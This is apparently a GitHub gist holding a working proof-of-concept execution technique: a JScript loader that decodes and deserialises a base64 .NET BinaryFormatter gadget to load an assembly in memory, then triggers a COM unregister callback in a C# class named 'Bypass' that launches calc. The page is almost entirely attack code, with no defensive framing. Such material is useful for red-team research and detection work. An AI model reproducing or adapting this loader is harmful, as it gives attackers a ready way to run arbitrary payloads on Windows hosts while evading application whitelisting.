Skip to content

Instantly share code, notes, and snippets.

@bohops
Forked from rvrsh3ll/subteegadget.cs
Created May 16, 2024 20:27
Show Gist options
  • Save bohops/7d043784a5e8a699c868d91975e066c7 to your computer and use it in GitHub Desktop.
Save bohops/7d043784a5e8a699c868d91975e066c7 to your computer and use it in GitHub Desktop.
[JS File]
function setversion() {
}
function debug(s) {}
function base64ToStream(b) {
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
var length = enc.GetByteCount_2(b);
var ba = enc.GetBytes_4(b);
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
ba = transform.TransformFinalBlock(ba, 0, length);
var ms = new ActiveXObject("System.IO.MemoryStream");
ms.Write(ba, 0, (length / 4) * 3);
ms.Position = 0;
return ms;
}
var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAA4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMApkgzXgAAAAAA"+
"AAAA4AACIQsBCwAABgAAAAYAAAAAAAA+JQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA6CQA"+
"AFMAAAAAQAAAmAIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAABEBQAAACAAAAAGAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAmAIAAABA"+
"AAAABAAAAAgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAMAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAACAlAAAAAAAASAAAAAIABQCQIAAAWAQAAAEAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAVgIoBAAACgAA"+
"cgEAAHAoBQAACgAAKjYAcjEAAHAoBQAACgAqNgByZwAAcCgFAAAKACo2AHKtAABwKAgAAAomKkJT"+
"SkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAAGQBAAAjfgAA0AEAAGgBAAAjU3RyaW5n"+
"cwAAAAA4AwAAuAAAACNVUwDwAwAAEAAAACNHVUlEAAAAAAQAAFgAAAAjQmxvYgAAAAAAAAACAAAB"+
"RxUAAAkAAAAA+iUzABYAAAEAAAAIAAAAAgAAAAQAAAACAAAACAAAAAUAAAABAAAAAgAAAAAACgAB"+
"AAAAAAAGACsAJAAGAH8AXwAGAJ8AXwAGAOIAwwAGAPYAJAAGAAgBwwAGACUBwwAKAFcBRAEAAAAA"+
"AQAAAAAAAQABAAEAEAAUAAAABQABAAEAUCAAAAAAhhgyAAoAAQBmIAAAAACWADgADgABAHQgAAAA"+
"AJYARgAOAAIAgiAAAAAAhgBWAAoAAwAAAAEAWwAAAAEAWwARADIAEwAZADIACgAhADIAGAAJADIA"+
"CgApAP4ADgAxADIACgA5ADIACgBBAF8BKAAuAAsALgAuABMANwBAADMAIwBDABsAHQBgADsAIwAE"+
"gAAAAAAAAAAAAAAAAAAAAAC9AAAABAAAAAAAAAAAAAAAAQAbAAAAAAAEAAAAAAAAAAAAAAABACQA"+
"AAAAAAAAADxNb2R1bGU+AHJlZ21lLmRsbABCeXBhc3MAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAu"+
"Y3RvcgBSZWdpc3RlckNsYXNzAFVuUmVnaXN0ZXJDbGFzcwBFeGVjAGtleQBTeXN0ZW0uUnVudGlt"+
"ZS5Db21waWxlclNlcnZpY2VzAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAUnVudGlt"+
"ZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAcmVnbWUAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZp"+
"Y2VzAENvbVZpc2libGVBdHRyaWJ1dGUAQ29uc29sZQBXcml0ZUxpbmUAQ29tUmVnaXN0ZXJGdW5j"+
"dGlvbkF0dHJpYnV0ZQBDb21VbnJlZ2lzdGVyRnVuY3Rpb25BdHRyaWJ1dGUAU3lzdGVtLkRpYWdu"+
"b3N0aWNzAFByb2Nlc3MAU3RhcnQAAAAAAC9JACAAYQBtACAAYQAgAGIAYQBzAGkAYwAgAEMATwBN"+
"ACAATwBiAGoAZQBjAHQAADVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUA"+
"eABlAGMAdQB0AGUAAUVJACAAcwBoAG8AdQBsAGQAbgAnAHQAIAByAGUAYQBsAGwAeQAgAGUAeABl"+
"AGMAdQB0AGUAIABlAGkAdABoAGUAcgAuAAEJYwBhAGwAYwAAAPe/XrkV9ipGnS6Wlwdbnw0ACLd6"+
"XFYZNOCJAyAAAQQAAQEOBCABAQgEIAEBAgUBAAEAAAQBAAAABQABEiEOCAEACAAAAAAAHgEAAQBU"+
"AhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQAAECUAAAAAAAAAAAAALiUAAAAgAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAACAlAAAAAAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/"+
"JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAA"+
"AAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAA8AgAAAAAAAAAAAAA8AjQA"+
"AABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAA"+
"AAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYA"+
"bwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAEnAEAAAEAUwB0AHIAaQBu"+
"AGcARgBpAGwAZQBJAG4AZgBvAAAAeAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwA"+
"ZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBv"+
"AG4AAAAAADAALgAwAC4AMAAuADAAAAA0AAoAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHIA"+
"ZQBnAG0AZQAuAGQAbABsAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAA"+
"ADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAAByAGUAZwBtAGUALgBkAGwA"+
"bAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAuADAAAAA4"+
"AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAAEA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5S"+
"ZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";
var entry_class = 'Bypass';
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var d = fmt.Deserialize_2(stm);
al.Add(undefined);
var rgsvcs = new ActiveXObject("System.Runtime.InteropServices.RegistrationServices");
var assembly = d.DynamicInvoke(al.ToArray());
var res = rgsvcs.UnregisterAssembly(assembly);
WScript.StdOut.WriteLine(res);
[CS Class Example]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
[ComVisible(true)]
public class Bypass
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute");
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute either.");
}
public void Exec() { System.Diagnostics.Process.Start("calc"); }
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment